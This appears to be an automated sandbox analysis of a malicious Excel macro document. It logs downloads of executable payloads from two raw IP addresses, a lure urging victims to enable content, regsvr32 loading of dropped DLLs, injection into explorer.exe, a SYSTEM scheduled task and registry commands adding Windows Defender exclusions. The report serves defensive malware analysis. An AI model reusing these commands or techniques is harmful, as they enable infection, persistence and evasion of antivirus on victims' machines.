    Source: global trafficHTTP traffic detected: GET /44463.6668827546.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 111.90.148.104Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44463.6668827546.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 51.89.115.111Connection: Keep-Alive

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" button to unlock the document downloaded from the Internet. 38 n ^l: i ffmn i a ml
    Source: Screenshot number: 4Screenshot OCR: Document is Protected 18 19 20 21 VIEW COMPLETED DOCUMENT 22 23 24 25 26 27 :: THE STEPS
    Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" button to unlock the document downloaded from the Internet. 2. Click on "ENABLE CON
    Source: Document image extraction number: 0Screenshot OCR: Document is Protected VIEW COMPLE ILD DOCUMENT THE STEPS ARE REQUIRED TO FULLY DECRYPT THE DOCUMEN
    Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" button to perform Microsoft Exel Decryption Core to start the decryption of the doc
    Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" button to unlock the document downloaded from the Internet. 2. Click on "ENABLE CON
    Source: Document image extraction number: 1Screenshot OCR: Document is Protected VIEW COMPLETED DOCUMENT THE STEPS ARE REQUIRED TO FULLY DECRYPT THE DOCUMENT
    Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" button to perform Microsoft Exel Decryption Core to start the decryption of the doc
    Office process drops PE fileShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[2].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[3].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[1].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa2.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa1.der
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10016EB04_2_10016EB0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_100123464_2_10012346
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_100117584_2_10011758
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10014FC04_2_10014FC0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000D6EB06_2_000D6EB0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000D23466_2_000D2346
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000D17586_2_000D1758
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000D4FC06_2_000D4FC0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000D6EB014_2_000D6EB0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000D234614_2_000D2346
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000D175814_2_000D1758
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000D4FC014_2_000D4FC0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00096EB017_2_00096EB0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_0009234617_2_00092346
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_0009175817_2_00091758
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00094FC017_2_00094FC0
    Source: Claim-680517779-09242021.xlsOLE, VBA macro line: Sub auto_open()
    Source: Claim-680517779-09242021.xlsOLE, VBA macro line: Sub auto_close()
    Source: Claim-680517779-09242021.xlsOLE, VBA macro line: Private m_openAlreadyRan As Boolean
    Source: Claim-680517779-09242021.xlsOLE, VBA macro line: Private Sub saWorkbook_Opensa()
    Source: Claim-680517779-09242021.xlsOLE, VBA macro line: m_openAlreadyRan = True
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,4_2_1000C6C0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,4_2_1000CB77
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess Stats: CPU usage > 98%
    Source: Fiosa2.der.23.drStatic PE information: No import functions for PE file found
    Source: Fiosa.der.6.drStatic PE information: No import functions for PE file found
    Source: Fiosa.der.17.drStatic PE information: No import functions for PE file found
    Source: Fiosa1.der.14.drStatic PE information: No import functions for PE file found
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Frdsfsne' /d '0'
    Source: Claim-680517779-09242021.xlsOLE indicator, VBA macros: true
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
    Source: 44463.6668827546[1].dat.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: Fiosa.der.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: 44463.6668827546[2].dat.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: Fiosa1.der.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: 44463.6668827546[3].dat.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: Fiosa2.der.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................p. ..........&>.....(.P............................................................................................... .....Jump to behavior
    Source: C:\Windows\System32\reg.exeConsole Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........(.......N.......(...............Jump to behavior
    Source: C:\Windows\System32\reg.exeConsole Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......(...............Jump to behavior
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa.der
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa1.der
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtirgcvnp /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:03 /ET 16:15
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa1.der
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa2.der
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa2.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Frdsfsne' /d '0'
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Ltnurpxor' /d '0'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa.derJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa1.derJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa2.derJump to behavior
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa.derJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtirgcvnp /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:03 /ET 16:15Jump to behavior
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa1.derJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'Jump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa2.derJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Frdsfsne' /d '0'Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Ltnurpxor' /d '0'Jump to behavior
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Application Data\Microsoft\FormsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD567.tmpJump to behavior
    Source: classification engineClassification label: mal100.expl.evad.winXLS@33/11@0/3
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000D523 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,4_2_1000D523
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: Claim-680517779-09242021.xlsOLE indicator, Workbook stream: true
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000ABA3 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle,4_2_1000ABA3
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{E4A7369A-890C-4248-9B54-92DEDB8F0D3A}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{1D70F813-44FD-4BE1-8C13-D3E897FC24C9}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{38037388-88B6-45C8-AD57-44DA063B263F}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{1D70F813-44FD-4BE1-8C13-D3E897FC24C9}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{E4A7369A-890C-4248-9B54-92DEDB8F0D3A}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\Global\{38037388-88B6-45C8-AD57-44DA063B263F}
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000A51A FindResourceA,4_2_1000A51A
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEWindow found: window name: SysTabControl32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: Binary string: amstream.pdb source: explorer.exe, 00000006.00000003.516885155.0000000002581000.00000004.00000001.sdmp
    Source: Binary string: c:\chart-Green\Vowel-list\Place\935\Day.pdb source: regsvr32.exe, 00000004.00000002.516667603.000000001002A000.00000002.00020000.sdmp, explorer.exe, 00000006.00000003.518565464.0000000002581000.00000004.00000001.sdmp, regsvr32.exe, 00000009.00000002.574668774.000000001002A000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.582087753.000000001002A000.00000002.00020000.sdmp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1002202C push es; ret 4_2_1002202D
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10021C96 pushad ; iretd 4_2_10021C9E
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10026CE9 push dword ptr [esp+eax*4+38h]; iretd 4_2_10026CF4
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10026105 push edi; ret 4_2_1002611C
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1002514B pushad ; iretd 4_2_1002514C
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10027D58 pushfd ; ret 4_2_10027DEC
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10027679 push es; ret 4_2_100276FB
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10023B27 push es; retf 4_2_10023BA0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10022F6D push eax; retf 4_2_10022F97
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10022FAA push eax; retf 4_2_10022F97
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000DA00E push ebx; ret 6_2_000DA00F
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000DD485 push FFFFFF8Ah; iretd 6_2_000DD50E
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000DD4B6 push FFFFFF8Ah; iretd 6_2_000DD50E
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000D9D5C push cs; iretd 6_2_000D9E32
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000D9E5E push cs; iretd 6_2_000D9E32
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000DBB29 push esi; iretd 6_2_000DBB2E
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1002202C push es; ret 9_2_1002202D
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10021C96 pushad ; iretd 9_2_10021C9E
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10026CE9 push dword ptr [esp+eax*4+38h]; iretd 9_2_10026CF4
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10026105 push edi; ret 9_2_1002611C
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1002514B pushad ; iretd 9_2_1002514C
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10027D58 pushfd ; ret 9_2_10027DEC
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10027679 push es; ret 9_2_100276FB
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10023B27 push es; retf 9_2_10023BA0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10022F6D push eax; retf 9_2_10022F97
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10022FAA push eax; retf 9_2_10022F97
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_1002202C push es; ret 12_2_1002202D
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10021C96 pushad ; iretd 12_2_10021C9E
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10026CE9 push dword ptr [esp+eax*4+38h]; iretd 12_2_10026CF4
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10026105 push edi; ret 12_2_1002611C
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_1002514B pushad ; iretd 12_2_1002514C
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10012AEC GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,4_2_10012AEC
    Source: Fiosa2.der.23.drStatic PE information: real checksum: 0x7af7b should be: 0x88ca7
    Source: Fiosa.der.6.drStatic PE information: real checksum: 0x7af7b should be: 0xfeba5
    Source: Fiosa.der.17.drStatic PE information: real checksum: 0x7af7b should be: 0x88ca7
    Source: Fiosa1.der.14.drStatic PE information: real checksum: 0x7af7b should be: 0x88ca7

    Persistence and Installation Behavior:

    barindex
    Uses cmd line tools excessively to alter registry or file dataShow sources
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exeJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exeJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa1.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa2.der
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa.der
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa1.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa2.derJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[2].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[3].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[1].datJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa2.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa1.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa2.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa1.derJump to dropped file

    Boot Survival:

    barindex
    Drops PE files to the user root directoryShow sources
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa2.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa1.derJump to dropped file
    Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtirgcvnp /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:03 /ET 16:15

    Hooking and other Techniques for Hiding and Protection:

    barindex
    Overwrites code with unconditional jumps - possibly settings hooks in foreign processShow sources
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2520 base: 25102D value: E9 BA 4C E7 FF Jump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 236 base: 25102D value: E9 BA 4C E7 FF Jump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 1256 base: 25102D value: E9 BA 4C E3 FF Jump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 1408 base: 25102D value: E9 BA 4C E3 FF Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: Claim-680517779-09242021.xlsStream path 'Workbook' entropy: 7.94597570807 (max. 8.0)
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2600Thread sleep count: 46 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2032Thread sleep time: -148000s >= -30000sJump to behavior
